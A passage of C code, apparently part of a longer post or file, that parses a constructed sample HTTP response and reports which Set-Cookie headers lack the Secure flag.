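                count++;
            }
        }
        line = next;
    }
    return count;
}

/* Constructed sample response, not captured from any real site. */
static const char SAMPLE[] =
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: text/html\r\n"
    "Set-Cookie: SESSIONID=7f3a9c; Path=/; HttpOnly\r\n"
    "Set-Cookie: prefs=dark; Path=/; Secure\r\n"
    "set-cookie: secure=1; path=/\r\n"
    "Set-Cookie: auth=tok; Path=/; HttpOnly; SECURE\r\n"
    "\r\n";

int main(void)
{
    char names[128];
    int n = sniffable_cookies(SAMPLE, names, sizeof names);
    printf("%d cookie(s) without Secure: %s\n", n, names);
    return 0;
}
```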